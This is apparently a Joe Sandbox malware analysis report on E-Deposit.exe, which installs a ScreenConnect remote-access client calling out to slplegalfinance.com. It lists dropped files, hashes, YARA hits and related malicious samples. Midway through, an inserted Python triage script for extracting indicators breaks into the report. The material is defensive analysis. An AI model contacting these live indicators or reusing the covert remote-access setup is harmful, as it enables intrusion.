C:\Users\user\AppData\Local\Temp\MSICCC5.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\MSICCC5.tmp-\Microsoft.Deployment.Compression.Cab.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\MSICCC5.tmp-\Microsoft.Deployment.Compression.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\MSICCC5.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\MSICCC5.tmp-\Microsoft.Deployment.WindowsInstaller.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\MSICCC5.tmp-\ScreenConnect.Core.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\MSICCC5.tmp-\ScreenConnect.InstallerActions.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\MSICCC5.tmp-\ScreenConnect.Windows.dll | 0% | ReversingLabs | |
C:\Windows\Installer\MSID590.tmp | 0% | ReversingLabs | |
C:\Windows\Installer\MSID7B3.tmp | 0% | ReversingLabs | |
                                  No Antivirus matches
                                  No Antivirus matches
Source | Detection | Scanner | Label | Link
http://slplegalfinance.com:443/ | 0% | Avira URL Cloud | safe |
https://feedback.screenconnect.com/Feedback.axd | 0% | Avira URL Cloud | safe |
http://slplegalfinance.com:443/d | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
slplegalfinance.com | 185.143.228.176 | true | false | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://wixtoolset.org/releases/ | rundll32.exe, 00000004.00000003.1683864703.0000000004103000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1683493567.0000000004200000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1683493567.000000000426F000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr, Microsoft.Deployment.Compression.dll.4.dr, Microsoft.Deployment.Compression.Cab.dll.4.dr | false | | high
http://slplegalfinance.com:443/d | ScreenConnect.ClientService.exe, 00000007.00000002.3521515935.00000000024CD000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000007.00000002.3521515935.000000000257D000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000007.00000002.3521515935.0000000002419000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000007.00000002.3521515935.000000000234E000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000007.00000002.3521515935.00000000021CF000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000007.00000002.3521515935.00000000022A4000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000007.00000002.3521515935.000000000261C000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://wixtoolset.org/news/ | rundll32.exe, 00000004.00000003.1683864703.0000000004103000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1683493567.0000000004200000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1683493567.000000000426F000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr, Microsoft.Deployment.Compression.dll.4.dr, Microsoft.Deployment.Compression.Cab.dll.4.dr | false | | high
http://slplegalfinance.com:443/ | ScreenConnect.ClientService.exe, 00000007.00000002.3545982496.0000000004E70000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | ScreenConnect.ClientService.exe, 00000007.00000002.3521515935.000000000216D000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/v | rundll32.exe, 00000004.00000003.1683864703.0000000004103000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1683493567.0000000004200000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1683493567.000000000426F000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr, Microsoft.Deployment.Compression.dll.4.dr, Microsoft.Deployment.Compression.Cab.dll.4.dr | false | | high
https://feedback.screenconnect.com/Feedback.axd | ScreenConnect.Core.dll.2.dr | false | Avira URL Cloud: safe | unknown
https://docs.rs/getrandom#nodejs-es-module-support | ScreenConnect.WindowsCredentialProvider.dll.2.dr | false | | high
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
185.143.228.176 | slplegalfinance.com | Germany | | 61317 | ASDETUKhttpwwwheficedcomGB | false
                                              Joe Sandbox version:41.0.0 Charoite
                                              Analysis ID:1584729
                                              Start date and time:2025-01-06 11:45:19 +01:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 8m 21s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Run name:Run with higher sleep bypass
Number of new started processes analysed:13
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:E-Deposit.exe
                                              Detection:MAL
                                              Classification:mal66.evad.winEXE@15/65@1/1
                                              EGA Information:
                                              • Successful, ratio: 50%
                                              HCA Information:
                                              • Successful, ratio: 75%
                                              • Number of executed functions: 227
                                              • Number of non-executed functions: 2
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                              • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                              • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.45
                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                              • Execution Graph export aborted for target E-Deposit.exe, PID 7276 because it is empty
                                              • Execution Graph export aborted for target rundll32.exe, PID 7468 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                              • Report size getting too big, too many NtEnumerateKey calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              • Report size getting too big, too many NtSetInformationFile calls found.
                                              No simulations
                                              No context
                                              No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
ASDETUKhttpwwwheficedcomGB | armv5l.elf | Get hash | malicious | Unknown | Browse | 134.203.202.155
 | Fantazy.x86.elf | Get hash | malicious | Unknown | Browse | 191.108.204.217
 | Hilix.mpsl.elf | Get hash | malicious | Mirai | Browse | 173.239.228.7
 | https://sdazraf.hosted.phplist.com/lists/lt.php?tid=LkQEAA1XAgcGUE4JBFUIGlcAUFAaAwVaVxsIVFpTUgYHD1RQBlwaVAEFUwYKAFQaVVUMABpVUglQGwhSUwYZCl5ZAw4NU1IBVQYATFEGAFJaBQwHGgdSXAYbBVhSABkKAloCGw0GUgEEBgAGVwMADg | Get hash | malicious | Unknown | Browse | 102.165.14.26
 | armv5l.elf | Get hash | malicious | Unknown | Browse | 154.127.57.214
 | nsharm7.elf | Get hash | malicious | Mirai | Browse | 102.165.19.216
 | la.bot.mipsel.elf | Get hash | malicious | Mirai | Browse | 64.40.25.144
 | mips.elf | Get hash | malicious | Mirai, Moobot | Browse | 45.141.232.110
 | x86_32.nn.elf | Get hash | malicious | Mirai, Okiru | Browse | 85.208.114.155
                                              No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.dll | SecuredOnedrive.ClientSetup.exe | Get hash | malicious | ScreenConnect Tool | Browse |
 | SecuredOnedrive.ClientSetup.exe | Get hash | malicious | ScreenConnect Tool | Browse |
 | NotaFiscalOnline.ClientSetup.ex#.exe | Get hash | malicious | ScreenConnect Tool | Browse |
 | NotaFiscalOnline.ClientSetup.ex#.exe | Get hash | malicious | ScreenConnect Tool | Browse |
 | file.exe | Get hash | malicious | ScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar | Browse |
 | file.exe | Get hash | malicious | ScreenConnect Tool, Amadey, RHADAMANTHYS, XWorm, Xmrig | Browse |
 | file.exe | Get hash | malicious | ScreenConnect Tool, Amadey, LummaC Stealer, Vidar, XWorm, Xmrig | Browse |
 | dMDImIGmc7.exe | Get hash | malicious | ScreenConnect Tool | Browse |
 | dMDImIGmc7.exe | Get hash | malicious | ScreenConnect Tool | Browse |
C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Client.dll | SecuredOnedrive.ClientSetup.exe | Get hash | malicious | ScreenConnect Tool | Browse |
 | SecuredOnedrive.ClientSetup.exe | Get hash | malicious | ScreenConnect Tool | Browse |
 | NotaFiscalOnline.ClientSetup.ex#.exe | Get hash | malicious | ScreenConnect Tool | Browse |
 | NotaFiscalOnline.ClientSetup.ex#.exe | Get hash | malicious | ScreenConnect Tool | Browse |
 | file.exe | Get hash | malicious | ScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar | Browse |
 | file.exe | Get hash | malicious | ScreenConnect Tool, Amadey, RHADAMANTHYS, XWorm, Xmrig | Browse |
 | file.exe | Get hash | malicious | ScreenConnect Tool, Amadey, LummaC Stealer, Vidar, XWorm, Xmrig | Browse |
 | dMDImIGmc7.exe | Get hash | malicious | ScreenConnect Tool | Browse |
 | dMDImIGmc7.exe | Get hash | malicious | ScreenConnect Tool | Browse |
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:modified
                                                                                  Size (bytes):219732
                                                                                  Entropy (8bit):6.581710443928379
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:GW09LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMGh:50uH2aCGw1ST1wQLdqvh
                                                                                  MD5:CD1A26320D872AE141BB93D78D5F8EB7
                                                                                  SHA1:4A87E31C682485C9F2C4412CDA4911CA98063E12
                                                                                  SHA-256:8FD8AB05D1068D643B6106E40FAFA2555981D5C8447DC4F070407EB19101870B
                                                                                  SHA-512:D797748DF93F3D6D9BC7C0EA8902EBEE83EB4E2E4BAC791B52DBF4CDF192DBF076054BCA11797A2169A9F9FF0A67EEEE8DBE50FA527E425A433FD9B8836EC0E3
                                                                                  Malicious:false
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Config.Msi\59d35d.rbs, Author: Joe Security
                                                                                  Preview:...@IXOS.@.....@.-&Z.@.....@.....@.....@.....@.....@......&.{B8D1B927-3B49-E2F3-F63F-B1B560CECE3D}'.ScreenConnect Client (484f9eed1d8e13b9)..ScreenConnect.ClientSetup.msi.@.....@.....@.....@......DefaultIcon..&.{B8D1B927-3B49-E2F3-F63F-B1B560CECE3D}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (484f9eed1d8e13b9)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{E29000A5-D988-BF34-ACFB-64A448AB1544}&.{B8D1B927-3B49-E2F3-F63F-B1B560CECE3D}.@......&.{5D9AA345-F8BD-8991-FE6D-9CD87DEF2A88}&.{B8D1B927-3B49-E2F3-F63F-B1B560CECE3D}.@......&.{12B3F4C9-0930-DE85-D0AC-49BFF78FE3DC}&.{B8D1B927-3B49-E2F3-F63F-B1B560CECE3D}.@......&.{8E57D407-5D27-BB2E-53F9-13C161E29BDA}&.{B8D1B927-3B49-E2F3-F63F-B1B560CECE3D}.@......&.{CE2EDB79-B248-8637-FD32-785C13A46331}&.{B8D1B927-3B49-E2F3-F63F-B1B560CECE3D}.@......&.{0BF493B6-0475-E8DC-7971-F55AFBC83A92}&.{B8D1B927-3B49-E2F3-F63F
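The rollback script above is the most useful artifact in this block: it records the MSI product code and the ScreenConnect client instance ID (the string "ScreenConnect Client (484f9eed1d8e13b9)") that the installer wrote, which is what a responder needs to find the same installation on other hosts. The following is an added example, not part of this report and not Joe Security tooling: a small Python triage helper that parses the Key:Value record layout used on this page, extracts those indicators plus YARA rule names and the hashes of anything flagged malicious, and shows what the "Entropy (8bit)" field measures. The sample input is constructed from two of the records above, abbreviated; the helper names (parse_records, triage, hunt_hashes) are this example's own.

```python
"""Triage helper for the 'dropped files' records of a Joe Sandbox report.

Added example; it is not part of the report above and not Joe Security
tooling. It parses the Key:Value record layout used on this page, pulls out
the indicators a responder needs (the ScreenConnect instance ID and MSI
product GUID left in the rollback script, YARA rule names, hashes of files
flagged malicious) and shows what the 'Entropy (8bit)' field measures.
"""
import math
import re
from collections import Counter

KEY_RE = re.compile(r"^([A-Za-z0-9 ()\-]+):(.*)$")
GUID_RE = re.compile(r"\{[0-9A-F]{8}(?:-[0-9A-F]{4}){3}-[0-9A-F]{12}\}")
INSTANCE_RE = re.compile(r"ScreenConnect Client \(([0-9a-f]{16})\)")
YARA_RULE_RE = re.compile(r"Rule: (\w+)")

# Constructed input: two records copied (abbreviated) from the report above.
SAMPLE_REPORT = """\
Process:C:\\Windows\\System32\\msiexec.exe
File Type:data
Size (bytes):219732
Entropy (8bit):6.581710443928379
SHA-256:8FD8AB05D1068D643B6106E40FAFA2555981D5C8447DC4F070407EB19101870B
Malicious:false
Yara Hits:
• Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\\Config.Msi\\59d35d.rbs, Author: Joe Security
Preview:...@IXOS.@.....&.{B8D1B927-3B49-E2F3-F63F-B1B560CECE3D}'.ScreenConnect Client (484f9eed1d8e13b9)..ScreenConnect.ClientSetup.msi
Process:C:\\Windows\\System32\\msiexec.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Size (bytes):95512
Entropy (8bit):6.504684691533346
SHA-256:F1B5C000794F046259121C63ED37F9EFF0CFE1258588ECA6FD85E16D3922767E
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@.......
"""


def parse_records(text):
    """Split report text into one dict per dropped-file record.

    A record opens at a 'Process:' line.  'Key:Value' lines become fields
    (split on the first colon only, because values such as C:\\Windows contain
    colons); bullet lines ('• ...') are collected as a list under the preceding
    key; any other line is a wrapped continuation of the preceding value.
    """
    records, current, last_key = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("•"):
            if current is None:
                continue
            items = current.get(last_key)
            if not isinstance(items, list):
                items = current[last_key] = []
            items.append(line.lstrip("• "))
            continue
        m = KEY_RE.match(line)
        if m:
            key, value = m.group(1).strip(), m.group(2).strip()
            if key == "Process":
                current = {}
                records.append(current)
            if current is not None:
                current[key] = value
                last_key = key
        elif current is not None and isinstance(current.get(last_key), str):
            current[last_key] += line
    return records


def triage(records):
    """Reduce each record to the indicators a responder would act on."""
    findings = []
    for rec in records:
        preview = rec.get("Preview", "")
        yara = rec.get("Yara Hits") or []
        yara_text = " ".join(yara) if isinstance(yara, list) else yara
        findings.append({
            "sha256": rec.get("SHA-256", "").lower(),
            "malicious": rec.get("Malicious", "").lower() == "true",
            "is_pe": rec.get("File Type", "").startswith("PE32"),
            "entropy": float(rec.get("Entropy (8bit)", "nan")),
            "yara_rules": YARA_RULE_RE.findall(yara_text),
            "screenconnect_instances": sorted(set(INSTANCE_RE.findall(preview))),
            "msi_guids": sorted(set(GUID_RE.findall(preview))),
        })
    return findings


def hunt_hashes(findings):
    """SHA-256 values to sweep other hosts for: flagged malicious or YARA-matched."""
    return sorted(f["sha256"] for f in findings if f["malicious"] or f["yara_rules"])


def shannon_entropy(data):
    """8-bit Shannon entropy in bits per byte, the usual meaning of 'Entropy (8bit)'.

    0.0 for a constant buffer, 8.0 for uniformly distributed bytes.  The 6.0-6.6
    seen on the dropped PEs above is typical of plain compiled code; values
    close to 8 would instead point at packed or encrypted content.
    """
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


if __name__ == "__main__":
    found = triage(parse_records(SAMPLE_REPORT))
    for f in found:
        print(f)
    print("hunt for:", hunt_hashes(found))
```

Run it as a script to print the per-record findings; feeding it the full "Dropped Files" section of a report (copied as text) gives the complete indicator set, and the instance ID it extracts is the same string that appears in the ScreenConnect service name and install directory on an infected host.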
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):347
                                                                                  Entropy (8bit):4.803780834806902
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:8kVXdyrKDLIP12MUAvvR+oHO8fTG6cAtuRTAlrRF4l10hQerKQe9Tn:rHy2DLI4MWoHO8L9cAgRMZRCl1aHmh
                                                                                  MD5:EC6BAD264881A1AE9D05F73712399809
                                                                                  SHA1:A7921B44D20ED663D486210C0775C96C45C08F7B
                                                                                  SHA-256:5748A4BB4CC8E1E9BB3832E1F9E8914038A1B97D2C7523EC342E596317208FB8
                                                                                  SHA-512:ED77CAFA64FE224CB11718CE26906ED807EEB49B2D59E359A7AB0196CE3DBB177663F91E116354E56C6B2441D091A0A07F71413723B7F8DEC1CB946FA2045E64
                                                                                  Malicious:false
                                                                                  Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP@To...n_%.......&... A.p.p.l.i.c.a.t.i.o.n.T.i.t.l.e.....8U.n.d.e.r.C.o.n.t.r.o.l.B.a.n.n.e.r.T.e.x.t.F.o.r.m.a.t.1..../Please do not turn off or unplug your computer...
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):5733
                                                                                  Entropy (8bit):4.54751304306711
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:r6KTKyKUeTj26/BcBP61mJkB8KpwhpNeE:rYBcBy1N8J
                                                                                  MD5:6F99B6E5484B5785AB7BF8E46882205A
                                                                                  SHA1:8304A40796E3AA805F96F9AB6FCAC2E5A9676C6E
                                                                                  SHA-256:E15E9D01D8049FF1E1B01E8E9845DF20A4C80A9CF883AA84E0E407A2D865B8E3
                                                                                  SHA-512:56226014F2C00C062D7505687B2166CA2DA905FC921E292EAEDD95DC1FB9AD093EB9D1F657F7BA45B32E6040EE09361FB14535F6D0BF4E19FABF6B19942D928D
                                                                                  Malicious:false
                                                                                  Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADPJ....1P)...H.p...5...............0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2.....6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.....6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.....DB.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.V.i.s.i.b.l.e..... .....PNG........IHDR.............[i.@...KPLTE.x........l......{..v........r.R..m...p..........`..d._..@..s........dFU...0IDATx...n.0.....icS......i.nF.....s.(g..+..u..5V.....i..Mk.T.......y..r]c..p.|.Dy....5.:.[C.........................................................s.>..G..[[).....o.>.Z.-...>...X....W...?....yF.{m|I.8..r.k.NIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIY.l.o.}NctiZc.....r..X.V..7r.......h.,.....IEND.B`...#124586 .........C......................- " " -D*2**2*D<I;7;I<lUKKUl}ici}.............C..
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):50133
                                                                                  Entropy (8bit):4.759054454534641
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:p1+F+UTQd/3EUDv8vw+Dsj2jr0FJK97w/Leh/KR1exJKekmrg9:p1+F+UTQWUDv8vw+Dsj2jr0FJK97w/LR
                                                                                  MD5:D524E8E6FD04B097F0401B2B668DB303
                                                                                  SHA1:9486F89CE4968E03F6DCD082AA2E4C05AEF46FCC
                                                                                  SHA-256:07D04E6D5376FFC8D81AFE8132E0AA6529CCCC5EE789BEA53D56C1A2DA062BE4
                                                                                  SHA-512:E5BC6B876AFFEB252B198FEB8D213359ED3247E32C1F4BFC2C5419085CF74FE7571A51CAD4EAAAB8A44F1421F7CA87AF97C9B054BDB83F5A28FA9A880D4EFDE5
                                                                                  Malicious:false
                                                                                  Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.q...'..6....wp.......y....C|.)>..Ldt..... $...X..........1$.../...2.%%3./>>...L.y.0.C._.........1Y..Qj.o....<....=...R..;...C....&.......1p2.r.x.u?Y..R...c......X.....I.5.2q..R...>.E.pw .@ ).w.l.....S...X..'.C.I......-.Y........4.J..P<.E..=c!.@To..#.._.2.....K.!..h...z......t......^..4...D...f..Q...:..%.z.<......^.....;<...r..yC.....Q........4_.Sns..z.......=..]t...X..<....8.e`}..n....S.H[..S@?.~....,...j.2..*v.......B....A...a......D..c..w..K,..t...S.....*v....7.6|..&.....r....#....G......Y...i..'.............'.......Z.....#2e..........|....)..%....A.....4{..u;N......&q...}.tD..x.....4...J...L......5.Q..M....K..3U..M..............5...........t.>.......lYu....3TY.?...r...'.......3.m........=.H...#.o.........n.....,4.~...<h..u...i.H...V......V/...P.$%..z...
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):26722
                                                                                  Entropy (8bit):7.7401940386372345
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:rAClIRkKxFCQPZhNAmutHcRIfvVf6yMt+FRVoSVCdcDk6jO0n/uTYUq5ZplYKlBy:MV3PZrXgTf6vEVm6zjpGYUElerG49
                                                                                  MD5:5CD580B22DA0C33EC6730B10A6C74932
                                                                                  SHA1:0B6BDED7936178D80841B289769C6FF0C8EEAD2D
                                                                                  SHA-256:DE185EE5D433E6CFBB2E5FCC903DBD60CC833A3CA5299F2862B253A41E7AA08C
                                                                                  SHA-512:C2494533B26128FBF8149F7D20257D78D258ABFFB30E4E595CB9C6A742F00F1BF31B1EE202D4184661B98793B9909038CF03C04B563CE4ECA1E2EE2DEC3BF787
                                                                                  Malicious:false
                                                                                  Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP)...s^.J.....E.....(....jF.C...1P)...H..../..72J..I.J.a.K8c._.ks`.k.`.kK..m.M6p............b...P...........'...!...............K...............w.......P.......1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6.;...(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2.....0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2.8...,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6.....6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.4...6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.:...DB.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.V.i.s.i.b.l.e.xb..*B.l.a.n.k.M.o.n.i.t.o.r.T.e.x.t.C.o.l.o.r..b..*D.a.r.k.T.h.e.m.e.B.a.r.B.a.s.e.C.o.l.o.r..b..<D.a.r.k.T.h.
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):197120
                                                                                  Entropy (8bit):6.586775768189165
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:/xLtNGTlIyS7/ObjusqVFJRJcyzvYqSmzDvJXYF:FtNGTGySabqPJYbqSmG
                                                                                  MD5:3724F06F3422F4E42B41E23ACB39B152
                                                                                  SHA1:1220987627782D3C3397D4ABF01AC3777999E01C
                                                                                  SHA-256:EA0A545F40FF491D02172228C1A39AE68344C4340A6094486A47BE746952E64F
                                                                                  SHA-512:509D9A32179A700AD76471B4CD094B8EB6D5D4AE7AD15B20FD76C482ED6D68F44693FC36BCB3999DA9346AE9E43375CD8FE02B61EDEABE4E78C4E2E44BF71D42
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Joe Sandbox View:
                                                                                  • Filename: SecuredOnedrive.ClientSetup.exe, Detection: malicious, Browse
                                                                                  • Filename: SecuredOnedrive.ClientSetup.exe, Detection: malicious, Browse
                                                                                  • Filename: NotaFiscalOnline.ClientSetup.ex#.exe, Detection: malicious, Browse
                                                                                  • Filename: NotaFiscalOnline.ClientSetup.ex#.exe, Detection: malicious, Browse
                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                  • Filename: dMDImIGmc7.exe, Detection: malicious, Browse
                                                                                  • Filename: dMDImIGmc7.exe, Detection: malicious, Browse
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0.................. ... ....... .......................`......#.....@.................................A...O.... ..|....................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...|.... ......................@..@.reloc.......@......................@..B................u.......H...........4............_...... .........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*..{....*:.(......}....*.0..A........(....s....%.~(...%-.&~'.....y...s....%.(...(...+(...+o"...o....*....0..s.......~#.....2. ....+...j..... ......... ...............%.r...p.%.r...p............%.&...($....5..............s%....=...*..0...........~*...%-.&~).....|...s&...%.*...(...+..~+...%-.&~).....}...s(...%.+...(...+.r9..
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):68096
                                                                                  Entropy (8bit):6.06942231395039
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:+A0ZscQ5V6TsQqoSD6h6+39QFVIl1zJhb8gq:p0Zy3gUOQFVQzJq
                                                                                  MD5:5DB908C12D6E768081BCED0E165E36F8
                                                                                  SHA1:F2D3160F15CFD0989091249A61132A369E44DEA4
                                                                                  SHA-256:FD5818DCDF5FC76316B8F7F96630EC66BB1CB5B5A8127CF300E5842F2C74FFCA
                                                                                  SHA-512:8400486CADB7C07C08338D8876BC14083B6F7DE8A8237F4FE866F4659139ACC0B587EB89289D281106E5BAF70187B3B5E86502A2E340113258F03994D959328D
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Joe Sandbox View:
                                                                                  • Filename: SecuredOnedrive.ClientSetup.exe, Detection: malicious, Browse
                                                                                  • Filename: SecuredOnedrive.ClientSetup.exe, Detection: malicious, Browse
                                                                                  • Filename: NotaFiscalOnline.ClientSetup.ex#.exe, Detection: malicious, Browse
                                                                                  • Filename: NotaFiscalOnline.ClientSetup.ex#.exe, Detection: malicious, Browse
                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                  • Filename: dMDImIGmc7.exe, Detection: malicious, Browse
                                                                                  • Filename: dMDImIGmc7.exe, Detection: malicious, Browse
